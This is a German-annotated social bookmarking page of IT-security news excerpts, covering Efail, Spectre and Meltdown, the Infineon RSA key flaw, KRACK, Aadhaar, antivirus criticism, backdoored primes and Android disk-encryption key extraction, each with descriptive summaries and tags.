recentpopularlog in


Efail or OpenPGP is safer than S/MIME
Some may have noticed that the EFF has warnings [NB:] about the use of PGP out which I consider pretty overblown. The GnuPG team was not contacted by the researchers but I got access to version of the paper [NB:] related to KMail. It seems to be the complete paper with just the names of the other MUAs redacted. Here is a response I wrote on the weekend to a reporter who inquired on this problem: The topic of that paper is that HTML is used as a back channel to create an oracle for modified encrypted mails. It is long known that HTML mails and in particular external links like <img href=""/> are evil if the MUA actually honors them (which many meanwhile seem to do again; see all these newsletters). Due to broken MIME parsers a bunch of MUAs seem to concatenate decrypted HTML mime parts which makes it easy to plant such HTML snippets. There are two ways to mitigate this attack: - Don't use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links, - Use authenticated encryption. The latter is actually easy for OpenPGP because we started to use authenticated encryption (AE) since 2000 or 2001. Our AE is called MDC (Modification detection code) and was back then introduced for a very similar attack [NB: Massive Fail der gesamten in- und ausländischen Presse & inkl. EFF].
gnupg-users mailinglist, 14.05.2018
krypto_openpgp  software_krypto_gnupg  ngo_eff  itsicherheit_exploit_flaw  uni_de_fh_münster  software_mua_tb_enigmail  software_mua_html_mail  krypto_smime  itsicherheit_implementierung  itsicherheit_verdeckterkanal_data_exfil  itsicherheit_strategie  internet_protokoll_mime  krypto_openpgp_mdc  uni_nl_ku_leuven  uni_de_bochum 
7 days ago by kraven
Super-GAU für Intel: Weitere Spectre-Lücken im Anflug
Ganze acht neue Sicherheitslücken in Intel-CPUs haben mehrere Forscher-Teams dem Hersteller bereits gemeldet, die aktuell noch geheimgehalten werden. Alle acht sind im Kern auf dasselbe Design-Problem zurückzuführen, das der Abschnitt "Meltdown und Spectre für Dummies" näher erläutert – sie sind sozusagen Spectre Next Generation. Jede der acht Lücken hat eine eigene Nummer im Verzeichnis aller Sicherheitslücken bekommen (Common Vulnerability Enumerator, CVE) und jede erfordert eigene Patches – wahrscheinlich bekommen sie auch alle eigene Namen. Konkrete Informationen liegen uns bisher nur zu Intels Prozessoren und deren Patch-Plänen vor. Es gibt jedoch erste Hinweise, dass zumindest einzelne ARM-CPUs ebenfalls anfällig sind. Vier der Spectre-NG-Sicherheitslücken stuft Intel selbst mit einem "hohen Risiko" ein; die Gefahr der anderen vier ist lediglich als mittel bewertet. Eine der Spectre-NG-Lücken vereinfacht Angriffe über Systemgrenzen hinweg so stark, dass wir das Bedrohungspotential deutlich höher einschätzen als bei Spectre. Konkret könnte ein Angreifer seinen Exploit-Code in einer virtuellen Maschine (VM) starten und von dort aus das Wirts-System attackieren – also etwa den Server eines Cloud-Hosters. Oder er greift die auf dem gleichen Server laufenden VMs anderer Kunden an.
ct, 03.05.2018
itsicherheit_cpu_meltdown_spectre  itsicherheit_seitenkanalanalyse  itsicherheit_exploit_flaw  itsicherheit_hardware  itsicherheit_implementierung  tech_hw_chip_cpu  tech_hw_chip_cpu_cache  unternehmen_amd  unternehmen_intel  unternehmen_allg_desinformation_propaganda  itsicherheit_by_obscurity  itsicherheit_virtualisierung 
17 days ago by kraven
Reading privileged memory with a side-channel
We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts. Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. So far, there are three known variants of the issue: Variant 1: bounds check bypass (CVE-2017-5753), Variant 2: branch target injection (CVE-2017-5715), Variant 3: rogue data cache load (CVE-2017-5754). Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at: Spectre (variants 1 and 2), Meltdown (variant 3) [NB: Fuck you Intel, mein nxter Rechner wird non-intel].
google project zero, 03.01.2018
itsicherheit_exploit_flaw  itsicherheit_malware_spyware  itsicherheit_speicher_aslr  itsicherheit_hardware  itsicherheit_implementierung  itsicherheit_os  itsicherheit_seitenkanalanalyse  unternehmen_intel  sicherheitsforschung_itsicherheit  software_os_linux  software_os_windows  software_os_mac  software_os_kernel  unternehmen_amd  unternehmen_arm  tech_hw_chip_cpu  tech_hw_chip_cpu_cache  itsicherheit_cpu_meltdown_spectre 
january 2018 by kraven
Millions of high-security crypto keys crippled by newly discovered flaw
A crippling flaw in a widely used code library has fatally undermined the security of millions of encryption keys used in some of the highest-stakes settings, including national identity cards, software- and application-signing, and trusted platform modules protecting government and corporate computers. The weakness allows attackers to calculate the private portion of any vulnerable key using nothing more than the corresponding public portion. Hackers can then use the private key to impersonate key owners, decrypt sensitive data, sneak malicious code into digitally signed software, and bypass protections that prevent accessing or tampering with stolen PCs. The five-year-old flaw is also troubling because it's located in code that complies with two internationally recognized security certification standards that are binding on many governments, contractors, and companies around the world. The code library was developed by German chipmaker Infineon and has been generating weak keys since 2012 at the latest. The flaw is the one Estonia's government obliquely referred to last month when it warned that 750,000 digital IDs issued since 2014 were vulnerable to attack. Estonian officials said they were closing the ID card public key database to prevent abuse. Last week, Microsoft, Google, and Infineon all warned how the weakness can impair the protections built into TPM products that ironically enough are designed to give an additional measure of security to high-targeted individuals and organizations. The flaw is the subject of a research paper titled The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli, which will be presented on November 2 at the ACM Conference on Computer and Communications Security. The vulnerability was discovered by Slovak and Czech researchers from Masaryk University in the Czech Republic, Enigma Bridge in Cambridge, UK, and Ca' Foscari University in Italy.
ars technica, 16.10.2017
eid_dokument  itsicherheit_code_signing  itsicherheit_exploit_flaw  tech_hw_chip_krypto_tpm  krypto_bibliothek_rsa_infineon  unternehmen_infineon  krypto_entschlüsselung  krypto_algo_rsa  krypto_faktorisierung  krypto_key_recovery  de_bundesamt_bsi  itsicherheit_zertifizierung  itsicherheit_implementierung  krypto_openpgp  krypto_verschlüsselung_datenträger  krypto_verschlüsselung_kommunikation  krypto_verschlüsselung_transport  tech_hw_krypto_token  krypto_tls_cert  krypto_signierung  krypto_signierung_qes 
october 2017 by kraven
Falling through the KRACKs
The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.
matthew green, 16.10.2017
krypto_algo_wpa2  internet_wlan  tech_wifi_wlan  itsicherheit_exploit_flaw  itsicherheit_trafficmanipulation_paketinjektion  krypto_entschlüsselung  krypto_verschlüsselung_transport  verband_ieee  überwachung_internet_mitm  itsicherheit_implementierung 
october 2017 by kraven
India's database with biometric details of its billion citizens ignites privacy debate
In 2008, they formulated Aadhaar, an audacious project "destined" to change the prospects of Indians. It was similar to Social Security number that US residents are assigned, but its implications were further reaching. Eight years later, Aadhar, which stores identity information such as a photo, name, address, fingerprints and iris scans of its citizens and also assigns them with a unique 12-digit number, has become the world's largest biometrics based identity system. According to the Indian government, over 1.11 billion people of the country's roughly 1.3 billion citizens have enrolled themselves in the biometrics system. About 99 percent of all adults in India have an Aadhaar card, it said last month. Today, the significance of Aadhaar, which on paper remains an optional program, is undeniable in the country. The government says Aadhaar has already saved it as much as $5 billion. But that's not it.
mashable, 14.02.2017
land_indien  datenbank_biometrie_in_aadhaar  in_uidai  in_uidai_india_stack  bezahlsystem_bargeldlos  biometrie_fingerabdruck  biometrie_gesicht  biometrie_iris  datenschutz_id_management  datenbank_population  datenbank_idnr_schlüssel  itsicherheit_datensicherheit  itsicherheit_by_obscurity  itsicherheit_implementierung  überwachung_person_identifizierung  überwachung_person_profil  unternehmen_ongrid 
february 2017 by kraven
Antivirensoftware: Die Schlangenöl-Branche
Antivirenprogramme gelten Nutzern und Systemadministratoren als unverzichtbar. Doch viele IT-Sicherheitsexperten sind extrem skeptisch. Antivirensoftware ist oft selbst voller Sicherheitslücken - und hat sehr grundsätzliche Grenzen.
golem, 21.12.2016
itsicherheit_by_obscurity  software_anti_malware_virus  itsicherheit_malware_spyware  itsicherheit_implementierung  überwachung_internet_mitm_sslproxy  itsicherheit_exploit_flaw  itsicherheit_strategie  tech_medien_kompetenz 
december 2016 by kraven
Gezinkte Primzahlen ermöglichen Hintertüren in Verschlüsselung
Einem Forscherteam ist die Berechnung eines diskreten Logarithmus bezüglich einer 1024-bittigen Primzahl gelungen – in nur zwei Monaten Rechenzeit auf 2000 bis 3000 Kernen. Doch die Bedeutung des Papers A kilobit hidden SNFS discrete logarithm computation von Fried, Gaudry, Heninger und Thomé reicht viel weiter. Es zeigt nämlich auf, dass sich mit Hilfe geschickt konstruierter Primzahlen eine Hintertür in Verschlüsselungsverfahren einbauen lässt, die nach heutigem Stand der Forschung niemand entdecken kann. Ihrem Konstrukteur ermöglicht sie jedoch das unbemerkte Knacken der Verschlüsselung. Das wirft die Frage auf, ob das nicht längst geschehen ist und beispielsweise die NSA gezinkte Primzahlen in Verschlüsselungsstandards eingeschmuggelt hat.
heise, 13.10.2016
krypto_backdoor  krypto_problem_dlp  itsicherheit_implementierung  krypto_algo_dh_kex  krypto_algo_dsa_dss  krypto_entschlüsselung  krypto_tls  geheimdienst_us_nsa_ces 
october 2016 by kraven
A Famed Hacker Is Grading Thousands of Programs — and May Revolutionize Software in the Process
At the Black Hat cybersecurity conference in 2014, industry luminary Dan Geer, fed up with the prevalence of vulnerabilities in digital code, made a modest proposal: Software companies should either make their products open source so buyers can see what they’re getting and tweak what they don’t like, or suffer the consequences if their software failed. Mudge and his wife, Sarah, a former NSA mathematician, have developed a first-of-its-kind method for testing and scoring the security of software — a method inspired partly by Underwriters Laboratories, that century-old entity responsible for the familiar circled UL seal that tells you your toaster and hair dryer have been tested for safety and won’t burst into flames. Called the Cyber Independent Testing Lab, the Zatkos’ operation won’t tell you if your software is literally incendiary, but it will give you a way to comparison-shop browsers, applications, and antivirus products according to how hardened they are against attack.
intercept, 29.07.2016
itsicherheit_audit  itsicherheit_exploit_flaw  itsicherheit_implementierung 
july 2016 by kraven
Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption
After covering a TrustZone kernel vulnerability and exploit, I thought this time it might be interesting to explore some of the implications of code-execution within the TrustZone kernel. In this blog post, I'll demonstrate how TrustZone kernel code-execution can be used to effectively break Android's Full Disk Encryption (FDE) scheme. We'll also see some of the inherent issues stemming from the design of Android's FDE scheme, even without any TrustZone vulnerability. I've been in contact with Qualcomm regarding the issue prior to the release of this post, and have let them review the blog post. As always, they've been very helpful and fast to respond. Unfortunately, it seems as though fixing the issue is not simple, and might require hardware changes.
bits, please, 30.06.2016
unternehmen_qualcomm  software_os_linux_android  itsicherheit_exploit_flaw  itsicherheit_firmware_mobilfunkgerät  itsicherheit_hardware  itsicherheit_mobil_os  krypto_entschlüsselung  krypto_verschlüsselung_datenträger  krypto_analyse_bruteforce  krypto_key_recovery  itsicherheit_implementierung  krypto_key_kdf  itsicherheit_by_obscurity  itsicherheit_authentisierung_passwort  überwachung_itforensik  krypto_backdoor 
july 2016 by kraven

Copy this bookmark:

to read